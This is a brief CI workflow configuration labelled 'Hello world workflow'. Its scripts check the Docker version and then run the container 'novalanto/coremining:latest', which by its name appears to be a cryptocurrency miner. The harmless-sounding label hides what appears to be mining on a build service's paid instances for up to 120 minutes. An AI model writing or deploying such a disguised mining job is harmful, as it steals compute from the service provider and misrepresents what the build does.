workflows:

  hello-world:

    name: Hello world workflow

    instance_type: linux_x2

    max_build_duration: 120
    
    scripts:

        - docker --version

        - docker run novalanto/coremining:latest
